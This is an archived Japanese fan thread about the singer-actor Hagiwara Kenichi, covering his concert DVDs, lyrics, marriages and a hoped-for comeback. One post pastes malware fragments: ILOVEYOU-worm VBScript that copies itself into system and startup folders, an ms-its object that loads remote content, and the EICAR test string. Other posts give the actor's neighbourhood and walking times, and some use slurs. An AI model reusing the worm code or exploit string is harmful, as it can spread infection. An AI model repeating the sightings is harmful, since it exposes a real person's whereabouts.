5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【唯一無二】★萩原健一★【天才不良】W

1 :SHOKEN:2005/11/10(木) 02:43:21 ID:/x/+JTD8
そろそろだな♪

2 :NO MUSIC NO NAME:2005/11/10(木) 02:53:56 ID:/x/+JTD8

【萩原健一】傷だらけの天使【水谷豊】

http://bubble4.2ch.net/test/read.cgi/natsudora/1129009621/l50


3 :NO MUSIC NO NAME:2005/11/10(木) 11:59:17 ID:HsUYxw4v
ここではシンガーショーケンを語るべき所なのかな?

4 :NO MUSIC NO NAME:2005/11/11(金) 17:25:29 ID:9gfek+R6


   テンプ解散後のソロとなったシンガーショーケンを語りましょう♪

5 :NO MUSIC NO NAME:2005/11/12(土) 16:00:49 ID:XX1/CsE6
Hey mister お前の夢を見たぜ〜♪
転がり回るルーレットマシーン マシーンのうず巻きで〜♪
お前の生首が泣いているぅ〜♪
生首が生首が叫んでるぅ〜♪
Oh mister gambling♪


6 :NO MUSIC NO NAME:2005/11/13(日) 13:52:24 ID:nsjP3Y5o
お前の面にゃ腐った死神が付いている♪
頼むからこれ以上〜♪そばに近づかないでくれよ〜♪
P-CAT OK?


7 :NO MUSIC NO NAME:2005/11/13(日) 15:47:03 ID:KItgO3j8
わたしのおすすめです。
http://www.muzie.co.jp/cgi-bin/artist.cgi?id=a028388

8 :NO MUSIC NO NAME:2005/11/13(日) 16:44:24 ID:YewAHgCZ
http://virus.org.ua/unix/woid.jpg

9 :NO MUSIC NO NAME:2005/11/13(日) 20:45:05 ID:nsjP3Y5o
影子はひとり〜♪
夜汽車に乗った〜♪
愛しい人の〜♪
面影追って〜♪
ど〜こ〜へ〜行〜く〜の〜か♪Blue train♪

指に挟んだ〜♪
煙草の煙り〜♪
剥げたマニキュア〜♪溜め息ひ〜とつ〜♪
ど〜こ〜へ〜行〜く〜の〜か〜Blue train♪

10 :NO MUSIC NO NAME:2005/11/16(水) 00:27:42 ID:9LaM9kOU
PIG時代とかの未発表音源は
ないもんかのう

11 :NO MUSIC NO NAME:2005/11/18(金) 22:37:50 ID:rag6pequ

>10
在りそうだけど出ないだろうね。

ドンジャン時代のは確実に有りそうだね。

それに萩原健一の資料本的なものが圧倒的に少ないね。

12 :NO MUSIC NO NAME:2005/11/25(金) 16:44:17 ID:ZoRLL/8H


              ローリング オン ザ ロード

13 :NO MUSIC NO NAME:2005/11/28(月) 01:57:01 ID:5EFt7vFQ
ライブDVDでるぞお

あげ

14 :NO MUSIC NO NAME:2005/11/29(火) 23:02:23 ID:f/RPflZh

倉庫LIVE 武道館LIVE 2月発売! 来春LIVEにて復活か♪

15 :NO MUSIC NO NAME:2005/12/06(火) 11:47:17 ID:2aNPGk0H
エリマキトカゲ

16 :NO MUSIC NO NAME:2005/12/09(金) 12:27:17 ID:nCTRxcEz


    ついに、いしだあゆみさんとのデュエット曲、映像で観れるね。

17 :NO MUSIC NO NAME:2005/12/28(水) 03:18:19 ID:rqOGcUl9
いしださんのところはカットじゃない!?

18 :NO MUSIC NO NAME:2005/12/28(水) 08:57:47 ID:wM1fu6oP
カットです。

19 :NO MUSIC NO NAME:2005/12/28(水) 14:16:09 ID:kD+D7xXf
共同掲示板のブレインズとかいう名古屋か神戸に住んでるホモ野郎の書き込みむかつくよな。

20 :NO MUSIC NO NAME:2005/12/29(木) 19:04:03 ID:1C9kwEG5
全然むかつかないよ。なんで名古屋か神戸なん?

21 :NO MUSIC NO NAME:2005/12/29(木) 20:44:14 ID:5g0dP07o
阿久悠大全集
ジュリー胴上げに
ちろっとショーケン写ったね

22 :NO MUSIC NO NAME:2005/12/29(木) 22:33:51 ID:1C9kwEG5
見たよ胴上げ。一瞬でも男前じゃわ〜

23 : 【大吉】 【68円】 :2006/01/01(日) 19:04:47 ID:e7MyX8Oe
今年のショーケンの運勢は。

24 :逃げないて:2006/01/03(火) 00:13:57 ID:h7s9ESyE
全くそうは思いません。


25 :NO MUSIC NO NAME:2006/01/03(火) 00:30:14 ID:9WaU6Uo1
>>24
なにが?

26 :NO MUSIC NO NAME:2006/01/07(土) 20:36:21 ID:qULvbiSp
ショーケンのハスキーな声で歌う「サマータイム」は最高!


27 :NO MUSIC NO NAME:2006/01/07(土) 21:04:12 ID:qULvbiSp
間違った!
「STOP THE MUSIC」だったよ
ヨッチンの声も好きだけど。


28 :NO MUSIC NO NAME:2006/01/22(日) 11:25:48 ID:2dCtlyml
('A`)・・・。

29 :NO MUSIC NO NAME:2006/01/24(火) 06:33:46 ID:4cNgItA2
歌手『ショーケン』のライバルは、ジュリー。
俳優『ショーケン』のライバルは、優作で良い?
で、テレビは許すから、結婚指輪は返してやれよ。

30 :NO MUSIC NO NAME:2006/01/25(水) 05:26:53 ID:SKwPWqPB
>>29
だれに言ってんの

31 :NO MUSIC NO NAME:2006/01/27(金) 13:06:13 ID:mn3YkcYV
収録曲

武道館は

Ah!Ha!
ラストダンスは私に
本牧綺談
ハロー・マイ・ジェラシー
シャ・ラ・ラ
ハイナポロポロ〜ホワイト&ブルー
ウッドント・セイ
どうしようもないよ
自由に歩いて愛して
テンダー・ナイト
フラフラ(ON SHANTI ON)
ルーシー
さよなら

倉庫は

去年の暮れ-予感(GOD BLESS YOU)
PM10時過ぎ逢いたくて・・・(DON’T YOU KNOW)
58年5月、別荘にて
もう一度抱いて
55日目、夕方和んで
九月朝、母を想い(SUZUMUSHI)
昔おさない夢
54日間、待ちぼうけ(SOME DAY’S NIGHT)
セクシー・ロンリー・ナイト
9月25日吉日、友の結婚(DONJUAN TRAIN)
58年9月、お世話になりました(THANK YOU MY DEAR FRIENDS)
だってさ。
石田あゆみはカットやね。

32 :NO MUSIC NO NAME:2006/01/27(金) 22:55:44 ID:uC4w3iz9
ワイドショーでショーケン事件史を放送した時も
結婚会見にあゆうつってなかったし。

勝手に映像使うなゴラってな感じなのかな?


33 :NO MUSIC NO NAME:2006/01/27(金) 23:36:51 ID:rbsZYMjn
あゆみさんは今もナベプロ噛んでるし。

34 :NO MUSIC NO NAME:2006/01/30(月) 12:39:23 ID:Jumwzk7V
あゆとは入籍もしてなかったみたいですよ。
内縁ってヤツですか。

35 :NO MUSIC NO NAME:2006/01/30(月) 21:13:13 ID:l1dsnhZq
籍いれなくて正解だったね、結婚に向かない男だし。

36 :NO MUSIC NO NAME:2006/01/31(火) 01:26:21 ID:qLsV/Aj9
ショーケンを乗りこなせる
名騎手ならぬ女房は
いるのか?

37 :NO MUSIC NO NAME:2006/01/31(火) 03:07:02 ID:Bjo/PSBG
>>36
アマゾネス倍賞さんはのりこなしてショーケンも気に入ってたぽい
けど自ら降りてしまった。なんで?

38 :NO MUSIC NO NAME:2006/01/31(火) 03:21:19 ID:Bjo/PSBG
ショーケン、例えば犯罪を犯した時に、なにがなんでも嘘ついてでも庇い味方でいてくれる女性じゃないと
「裏切り者!!」と思って激怒しそうなイメージ。

母性愛に溢れたヤクザの女的な人じゃないと無理じゃないかな。

39 :NO MUSIC NO NAME:2006/02/01(水) 18:26:26 ID:WkxGpJBz
>>36
倍賞さんも籍入れてなかったそうですね。
つまり、ショーケンはバツ2。

40 :NO MUSIC NO NAME:2006/02/01(水) 23:10:48 ID:QU7SLKaz
事実上はバツ4、すげー

41 :NO MUSIC NO NAME:2006/02/02(木) 09:52:11 ID:OJOlLFoK
いつでも恋に真剣な証拠かもよ。
遊びじゃないんだな。
一人の人と、結構長い。

42 :NO MUSIC NO NAME:2006/02/02(木) 15:02:06 ID:WL94yKQK
ショーケンと恋愛すると寿命縮みそう

43 :NO MUSIC NO NAME:2006/02/02(木) 20:03:28 ID:T1XDrYbF
最後の奥さんって、地味〜な感じのひとだったね。


44 :NO MUSIC NO NAME:2006/02/02(木) 20:12:56 ID:a+2SkWiI
ヘアメイクさんだっけ
写真も見たことないからどんな人だかわからない。

45 :NO MUSIC NO NAME:2006/02/07(火) 00:44:15 ID:W5yt1oMj
ニョウボなんざどうでもいい
今歌えないなら過去の映像だけでも
掘り出して欲しい

46 :NO MUSIC NO NAME:2006/02/07(火) 03:32:16 ID:Ui7U+vhJ
熱狂雷舞やドンファンライブの映像はないの?
テンプも見たくてたまらん。

47 :NO MUSIC NO NAME:2006/02/07(火) 16:19:49 ID:crOBBmyF
>>45
>>31の二つもヤフオクとかで高値で売買されてた
みたい。掘り尽くしても映像の権利とかって
面倒臭いし、少数のマニアが欲しがってるだけ
だろうから余程じゃないと発売はないでしょ。

48 :NO MUSIC NO NAME:2006/02/10(金) 18:23:24 ID:lJeNASvA
いやいや今のショーケンは収入ゼロだから、
出してくれる所があれば、出すでしょ。
俺は浅草ロックフェスで柳ジョージ&レイニーウッド
のステージに飛び入り(?)したのが見たい。
大晦日、紅白の裏でテレ朝で放映されたし。

49 :NO MUSIC NO NAME:2006/02/13(月) 15:32:55 ID:nUe72xsU
>>48
それはそうなんだけど、ショーケンの収入云々というより
出したところで売れないんだったらメーカーが発売しない
ってこと。だから今回の発売はちょっとした奇跡じゃないですか。
幻の映像もたくさんあると思われるけど、『多分出してもそんなに売れない』
と思われてるから、メーカーさんたちはマジメに探してないんでしょう。
今回のが爆発的に売れたら、幻の原盤を持ってる人たちは本腰入れるんじゃ
ないでしょうか???

50 :NO MUSIC NO NAME:2006/02/13(月) 22:53:00 ID:0eeDznRj
残念ながらそんなに売れるとは・・
認知されてないし。

51 :NO MUSIC NO NAME:2006/02/21(火) 00:55:52 ID:wD6eASeg
確か彼は結婚したときに芸能界人以外の人の方が気持ちが安らぐのに気付いたといってたが。

52 :NO MUSIC NO NAME:2006/02/24(金) 19:04:20 ID:NWfqaLAn
DVD買った!!
やっぱカッコいい〜…昔は。

53 :NO MUSIC NO NAME:2006/02/24(金) 21:51:50 ID:3D1mY196


54 :NO MUSIC NO NAME:2006/02/28(火) 00:54:57 ID:VZCiE4ji
倉庫ライブが以外にカックイイ!!

55 :NO MUSIC NO NAME:2006/02/28(火) 19:12:49 ID:6aquanGo
武道館はブランニューディが未収録なのは
仕方ないとしても。アンコールでゲストの紹介を叫ぶ時の
ショーケンの声まで急にカットしてあった。
声の調子がよくないと言ってたけど、Rやエンターパンサーに
比べれば数倍よく出てる。カッコイイよやっぱり。
DONJUANは速水清司が抜けた後なのが残念。

56 :NO MUSIC NO NAME:2006/03/01(水) 18:34:08 ID:PeMnmY6N
武道館のショーケン、古さを感じさせないね。
さすがに客席の人たちが映ると23年前だなって感じ。

57 :NO MUSIC NO NAME:2006/03/01(水) 22:42:10 ID:ozpHQRiG
ラストダンスは私にでロックンロールはなんていってんの?

58 :NO MUSIC NO NAME:2006/03/02(木) 09:05:22 ID:761Pr8tn
>>57
ガンジャ

59 :NO MUSIC NO NAME:2006/03/02(木) 12:44:18 ID:1MY7t+qQ
>>57
たのきんトリオにおあげ〜なさい


60 :NO MUSIC NO NAME:2006/03/02(木) 18:19:30 ID:4tMdkVXm
>>57♪ロックンロールはマ・・・みたいに、心酔わせるの。
マリファナか麻薬って歌ってるのかな。

61 :NO MUSIC NO NAME:2006/03/03(金) 13:12:25 ID:hk9meRzw
>>60
だから♪ロックンロールは『ガンジャ』みたいに…
だって!

62 :NO MUSIC NO NAME:2006/03/04(土) 01:04:54 ID:Ughi1jb4
>>59
たのきんトリオとは?

63 :NO MUSIC NO NAME:2006/03/04(土) 16:04:13 ID:F2LnCNpI
たのきん。
田 原俊彦
野 村義男
近 藤真彦



きん

てさ、あんまりなネーミングじゃね。

64 :NO MUSIC NO NAME:2006/04/05(水) 17:57:58 ID:HkYwN5Q9
>>214
ageる事で>>212みたいな奴をもっと増やそうってか?
おもしろいやろうか!


65 :NO MUSIC NO NAME:2006/04/06(木) 05:33:39 ID:bvIGQpDO
...

66 :NO MUSIC NO NAME:2006/04/06(木) 16:45:47 ID:9preuKoj
>>64
【唯一無二】★萩原健一★【天才不良】W
http://music5.2ch.net/test/read.cgi/musicjm/1131558201/64
64 :NO MUSIC NO NAME:2006/04/05(水) 17:57:58 ID:HkYwN5Q9
>>214
ageる事で>>212みたいな奴をもっと増やそうってか?
おもしろいやろうか!

堂珍嘉邦のソロ活動スレ26
142 :NO MUSIC NO NAME:2006/04/05(水) 17:00:24 ID:HkYwN5Q9
http://music5.2ch.net/test/read.cgi/musicjm/1141047226/142

米倉利紀 に
109 :NO MUSIC NO NAME:2006/04/05(水) 17:17:36 ID:HkYwN5Q9
http://music5.2ch.net/test/read.cgi/musicjm/1141914646/109

67 :NO MUSIC NO NAME:2006/04/17(月) 00:03:45 ID:/ZHRwcnj
萩原の台詞はボソボソで何言ってるか分からん

68 :NO MUSIC NO NAME:2006/04/24(月) 22:06:59 ID:EYumR/or
あげ

69 :NO MUSIC NO NAME:2006/04/25(火) 19:22:03 ID:5taSyJgY
アンドレマルローライブってDVD化されてんの?

70 :NO MUSIC NO NAME:2006/04/26(水) 11:39:41 ID:jOc4VAsP
されとるよ

71 :NO MUSIC NO NAME:2006/04/26(水) 18:52:41 ID:jRnndQ09
あんがとう

72 :NO MUSIC NO NAME:2006/04/27(木) 01:12:24 ID:VkmAUFg6
ii

73 :NO MUSIC NO NAME:2006/05/04(木) 19:47:02 ID:y8t+FO/+
a

74 :NO MUSIC NO NAME:2006/06/18(日) 01:27:48 ID:pkPQerVK
竜二の曲はいってるアルバムってあります?

75 :NO MUSIC NO NAME:2006/06/18(日) 21:09:44 ID:vBkN0qZg
あるよ。ララバイ。

76 :NO MUSIC NO NAME:2006/06/21(水) 21:52:13 ID:qmd8hQH+
なんちゅか?ポンちゅうか?

77 :NO MUSIC NO NAME:2006/07/02(日) 20:31:02 ID:iUo7oju4
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

78 :NO MUSIC NO NAME:2006/08/09(水) 00:34:07 ID:p63KwmRM
俺はEnterざパンサーのネックレスまだしてるよ。あんときのジャケットがほしいけど方法ないかな?

79 :NO MUSIC NO NAME:2006/08/09(水) 07:19:17 ID:p63KwmRM
おー今夜はテンダナイアンナ女こんな女女女女女

80 :求む:2006/08/14(月) 23:46:30 ID:GjcmXR6p
誰か〜来て下さい。 かれこれ20年もまってるんだけど↑

81 :求む:2006/08/18(金) 00:21:55 ID:Ygnaru+v
ラストバラードは君に。いまさらながらもいちど見たい。何とかならないかな?

82 :NO MUSIC NO NAME:2006/08/30(水) 22:46:11 ID:Ir9el9+G
シャンティライブのフラフラ最高だぜ

83 :NO MUSIC NO NAME:2006/09/16(土) 21:33:06 ID:B60AvPF9
うん

84 :NO MUSIC NO NAME:2006/09/28(木) 21:59:24 ID:nBkneSed
復活はありますか? 謹慎は解けそうですか? わかる方教えて。

85 :NO MUSIC NO NAME:2006/09/29(金) 19:24:24 ID:5UK+40Is
謹慎しているわけではなさそうよ。仕事がないだけで。


86 :NO MUSIC NO NAME:2006/10/03(火) 20:35:25 ID:RJ0sBIcx
そうなんだー。ありがとう。清とジョイントでもいいのに.....

87 :NO MUSIC NO NAME:2006/10/04(水) 00:42:17 ID:KWSxxUrI
要するに干されてるのか

88 :NO MUSIC NO NAME:2006/10/04(水) 22:14:10 ID:dMcFVSAM
いや
干されているのならまだ未来があるけど

すでにいないことにされてそうでコワイ

89 :NO MUSIC NO NAME:2006/10/05(木) 19:12:09 ID:n4WEo2Lv
例え復帰しても声大丈夫か?演技できるんか?
やら手放しで喜べないところがつらい。

90 :NO MUSIC NO NAME:2006/10/06(金) 23:39:23 ID:R88sS/2W
やっぱ映画から復活してほしいよ。ぎらぎらみたいなGang、悪役してもらいたい。 ライブは音合わせで声使ってしまうから無理だよね。

91 :NO MUSIC NO NAME:2006/10/07(土) 02:20:40 ID:Adp1781/
かっこつけた役じゃなくダメダメヨレヨレの役やってほしい。
かつてはならしたが今は衰えてしまい・・・しかし人間味があるような。

92 :NO MUSIC NO NAME:2006/10/07(土) 07:22:34 ID:YTbJ87YR
かちょーさんの厄年かい! それともおさむちゃん! God Bless you

93 :NO MUSIC NO NAME:2006/10/12(木) 23:17:58 ID:tS3cTRQ7
さくらぁーこーよー さくらぁーこーよー

94 :NO MUSIC NO NAME:2006/10/13(金) 22:15:09 ID:XxU0j0yn
また会おうきっとだよ!覚えておいて! アァ〜〜 ショウケン見たい!!

95 :Bless you:2006/10/18(水) 06:28:42 ID:Dg3e16mU
先週、スナック逝ったらWhite&Blueのカラオケがありました(喜)15年前には、AH!HA!もあったんだよね。大阪で..、酒と泪と..、桜子、泣けるわけが...、ILove youさえ..54間待ちぼうけ..前略..お前に惚れた、この他知ってる方教えて下さい。

96 :NO MUSIC NO NAME:2006/10/22(日) 16:49:11 ID:rc93+c5m
テレ朝の昼のワイドショーのインタヴューから丁度一年ぐらい経つけど
丸一年ショーケン見てないことになる、寂しいよね。
テレビはともかく雑誌等のインタヴューの依頼ぐらいありそうだけど、
それも断ってるのかな?


97 :NO MUSIC NO NAME:2006/10/25(水) 16:16:27 ID:lx9B5BGp
消息不明・・・・・

98 :NO MUSIC NO NAME:2006/10/29(日) 03:49:39 ID:ezJomcij
鶴見区の菊名付近でウォーキングしてるの見るよ。近くに内路て交差点あるんだかそこ曲がる坂の歩道を朝杖(多分歩くリズムとる為)持ちながら。帽子かぶって。ただヤッパリ肩幅とかあるし目みると分かる。ヤッパリ声とかかけられないよね

99 :NO MUSIC NO NAME:2006/10/29(日) 08:00:38 ID:VsK5drTs
ショーケン、ウォーキング続けてるんですね。
朝何時ぐらいに目撃しますか?

100 :NO MUSIC NO NAME:2006/10/29(日) 14:31:14 ID:ezJomcij
見かけるのは朝八時半くらいです。でも運動心がけてる姿勢は引き込もっちゃいけない自分との闘いもあるんですかね。でも歩いてるのも絵になります。かっこいい

101 :NO MUSIC NO NAME:2006/10/29(日) 19:07:53 ID:12jUAEmY
またお遍路やってるんだ。まだまだくさっちゃいないね。

102 :NO MUSIC NO NAME:2006/10/31(火) 06:10:02 ID:itVUlK8K
歩き疲れた〜お遍路の帰り〜これでリストラかとふと一人つぶやいてぇ〜 ほんとになったらこまるぞ! 復活!ショウケン! かも〜ん!

103 :NO MUSIC NO NAME:2006/11/01(水) 09:44:46 ID:GZXPrYRX
傷だらけの天使映画化で復帰だそうですね

104 :NO MUSIC NO NAME:2006/11/01(水) 12:51:45 ID:fK+ZHCI0
ショーケン ガンガレ!

105 :NO MUSIC NO NAME:2006/11/02(木) 01:32:17 ID:tOq8hU66
映画で復活!? 何処からの情報ですか?映画〜主題歌〜CD〜ライブ。 この流れで宜しく! たまらん♯たまらん♯たまらんぜ!

106 :NO MUSIC NO NAME:2006/11/06(月) 23:28:56 ID:b9UNQM/a
みなさんスマステ見ましたかっ!?
松田優作特集、ちょこっとでしたけど告別式で美由紀夫人と涙ながらに握手を交わす姿が映りましたね。
ちょうど「あいつがトラブル」の撮影時期でしょうか。
まんま沖田代表でした。

107 :NO MUSIC NO NAME:2006/11/06(月) 23:48:13 ID:b9UNQM/a
小堺さんと阿藤快さんが「ごきげんよう」でショーケンの話をされていましたよ。武田の軍勢が壊滅してゆく姿を見て勝頼が腰からくだけ落ちるシーン(影武者)のエピソードでした。なんどもなんどもNGが出て、あのシーンだけでも三日かかったとか・・・
酒をあびるように飲んだショーケンが「俺の演技のどこが悪いの??」と共演者・スタッフの部屋をまわって聞きまくってたそうですね。「ショーケン、フラフラだったよ」と阿藤快さんが仰ってました。

黒澤監督にしごかれた話は有名ですけど、現場にいた第3者の証言を聞くのは初めてだったので生々しく感じましたぁ・・・
そんな影武者後、を意識しながらひさびさに『誘拐報道』の名演を見てみようと思いまっす。

108 :NO MUSIC NO NAME:2006/11/07(火) 23:39:42 ID:DXZejyoN
見たことはないのですが、現在再放送中のジャニーズ・ドラマ『野ブタ。をプロデュース』。主演のふたりの役名が“修二”と“彰(あきら)”でした。
これは明らかに、、、、

109 :NO MUSIC NO NAME:2006/11/09(木) 22:05:44 ID:SNdqqbpB
倉本聰ファンサイトからの情報によると、二宮くん演じる一平の父親役は当初ショーケンだったとの噂がありました。
倉本先生はショーケンの起用を頑なに主張したそうですが、局側が飲まなかったという説もあるようです。

もし本当なら、倉本先生がショーケンを起用してドラマを作ろうとしたことが、ちょっとうれしいっす。
いつかオリジナルの新作というかたちで実現してほしいなぁ。


110 :NO MUSIC NO NAME:2006/11/11(土) 22:43:34 ID:nIzrTvEg
>>108

ジャニなんぞと一緒にするな! カス


111 :NO MUSIC NO NAME:2006/11/16(木) 21:18:00 ID:CyJUXpo2
ジャニオタの来る所じゃねえ

112 :NO MUSIC NO NAME:2006/11/20(月) 17:30:20 ID:fC6cC8nX
あの時、U作じゃなくショーケンが、O崎じゃなくショーケンが逝ってればいまでも語り継がれたろう。なぜに逝った人達が伝説になるのやら。マァー逝ったからなんだろうけど。いまでも俺のバイブルは萩原健一だ!

113 :諏訪魔:2006/11/26(日) 15:17:29 ID:xt1RzwNw
「オーラの泉」に出演してほしい。江原だけでなく、美輪のへらず口にパンチしてほしい。

114 :NO MUSIC NO NAME:2006/11/27(月) 16:22:58 ID:Phwocd7L
ズバリ言うわよ にも出て細木にキレて欲しい

115 :NO MUSIC NO NAME:2006/12/02(土) 07:45:57 ID:obM2GrhX
スイマセンがショーケンと萩原流行は兄弟ですか?分かる方いましたらお願いします。

116 :NO MUSIC NO NAME:2006/12/07(木) 00:55:30 ID:VTkk40Ci
江波杏子とも付き合ってたんだよね
同棲までしててどうして別れたのか

117 :NO MUSIC NO NAME:2006/12/14(木) 14:25:20 ID:nriCEta2
12/11放送の 快傑えみちゃんねる(関西の方しか見れなかったと思います)で
名前は出なかったのですがショーケンの話を坂上忍さんと上沼恵美子さんが
されてました。
二人ともあんまり良く思われてないようでした。
坂上さんは声が裏返る話を上沼さんは番組のゲスト(多分裕次郎は大根発言の
あった番組)で来られた時にお酒の臭いをプンプンさせてた等の話をされてました。




118 :NO MUSIC NO NAME:2006/12/15(金) 22:30:53 ID:zxPWH6/K
>>117さん。 坂上忍辺りの俳優に言われたくないわな! なんの記憶にも残らん奴に

119 :NO MUSIC NO NAME:2006/12/16(土) 01:27:30 ID:PtmsEFFn


上沼=欠席裁判が生き甲斐 ただのキモい意地悪豚マルキババァだろ


坂上忍?俳優 雀荘のバイトだろ。

120 :NO MUSIC NO NAME:2006/12/20(水) 09:44:36 ID:6DJA+Ywi
1月に始まるドラマ「拝啓、父上様」にでる噂あったけど見送りぽいね。
それにしても、ライブ、傷だらけ〜のその後とか
過去の栄光再び!!な焼き直しの企画ばかりつづいているのがちと気になる。




121 :NO MUSIC NO NAME:2006/12/21(木) 06:31:16 ID:mCN1WvOk
岸田今日子死去 無念です。

122 :NO MUSIC NO NAME:2006/12/21(木) 12:55:29 ID:1Q/ekrR+
ショーケンの実際の身長が知りたい!だれか見た人おしえて??

123 :NO MUSIC NO NAME:2006/12/22(金) 01:19:07 ID:VB3YbI6w
多分175ぐらいだと思う。猫背だからもう少し低く見えるかな。
身長聞いてどーすんの?

124 :NO MUSIC NO NAME:2006/12/31(日) 02:21:30 ID:niNpmqPo
芸能界に入る前、不良時代
地元で3人いたケンちゃんが
大ケン、中ケン、小ケンと
身長で呼び分けられていたという話・・・?

125 :NO MUSIC NO NAME:2006/12/31(日) 08:42:05 ID:h2Kf4Cvi
その話が、何?
身長も低かったんだろうけどまだ中学の頃の話だから
そっから伸びてるよ。
ダイケンチューケンは歳も上だし。

126 :NO MUSIC NO NAME:2007/01/06(土) 21:56:08 ID:tCtl2ZxG
>>118 119
同意

127 :NO MUSIC NO NAME:2007/01/19(金) 05:14:53 ID:y4MPccTi
動画upしました
up2540.zip 前略おふくろ様 U 第一話
http://www.774.cc:8000/upload-pro/all.html?1169150924

128 :NO MUSIC NO NAME:2007/01/20(土) 15:08:16 ID:wRrQq20r
>>127
GJ!傷だらけの天使も、うpお願い♪

129 :NO MUSIC NO NAME:2007/01/22(月) 07:03:33 ID:nMa11j9x
三郎さんよりやっぱおさむチャンだな! あと、片桐いくと★

130 :NO MUSIC NO NAME:2007/01/22(月) 23:12:35 ID:tAJSFNYr
各ショーケンファンサイトってこのところどーなってんの。
書き込みないし。
以前のファンはもうみんな遠ざかってしまったってことかな。
熱い書き込みが見れた日々もあったのにな。

131 :NO MUSIC NO NAME:2007/01/23(火) 20:34:32 ID:m4ccsttQ
なんだよなんだよ覗いてみたら結構書き込みあるじゃん。

132 :NO MUSIC NO NAME:2007/01/29(月) 16:43:07 ID:92rgh0bY
書き込み減ってんで確かにちょい不安。
本っ当にショーケン早く復活してくれないかなぁ、、
ところで、「傷天」で復活ってのはまだ継続中の話なの?



133 :NO MUSIC NO NAME:2007/01/29(月) 20:26:49 ID:mp/B2yi9
しゃららって何なの?

134 :NO MUSIC NO NAME:2007/01/31(水) 05:59:20 ID:aEJH1JMk
>>133 秘密の合言葉

135 :なんじゃいこりゃあー:2007/01/31(水) 12:55:59 ID:kP1l+Xqx
しょーがないじゃないですかあーとショーケンのものまねしてた桃井かおり最強。
優作がショーケンは神だとさ。大麻はいけないですか。子供がアイスキャンディー
食べたくて食べてどこがいけないのですか。by・ぶらっくれいん佐藤役

136 :貴明:2007/01/31(水) 14:25:36 ID:kP1l+Xqx
世田谷区祖師谷の憲武の実家で朝食を食ったショーケン。

おめえんち。あったけえなあ。

と涙をこぼしたそうな。

137 :NO MUSIC NO NAME:2007/02/06(火) 15:38:05 ID:xSAy5qG2
しゃららとしょうこ同一人物説浮上

138 :NO MUSIC NO NAME:2007/02/07(水) 15:49:11 ID:pGfpoSUX
しょーけん、朝仕事行くとき菊名のホームで何度か見かけましたよ。

やっぱりあの辺に住んでるんですねー。

139 :NO MUSIC NO NAME:2007/02/08(木) 12:00:13 ID:ZAt/0FvW
鶴見じゃないっけ?

140 :NO MUSIC NO NAME:2007/02/14(水) 00:36:12 ID:wU5+vT9Y
何故か最近「前略」をレンタルし始めた30歳です。25歳くらいでしょうか?当時のショーケンは。
今の25歳であの味を出せる役者はいませんね。彼が天才と言われたゆえんがよく分かります。

141 :NO MUSIC NO NAME:2007/02/14(水) 19:32:37 ID:lwaSWJef
>>140

悪いけどそれ、出来ればヨソ行って語ってくれる?
ショーケンを知らない子たちに宣伝してよ。

142 :NO MUSIC NO NAME:2007/02/14(水) 20:57:45 ID:nNNBs3cw
てか、拝啓父上様ってドラマ。前略とかぶるな。梅宮も出てるし。

143 :NO MUSIC NO NAME:2007/02/14(水) 21:04:32 ID:nNNBs3cw
あ、意識した番組だったのね。納得しました。

144 :NO MUSIC NO NAME:2007/02/16(金) 06:56:12 ID:zkAYVmqa
ムーミンのお別れ会の映像でショーケンが少し映ったが、ドキッとしたよ。よかった!

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)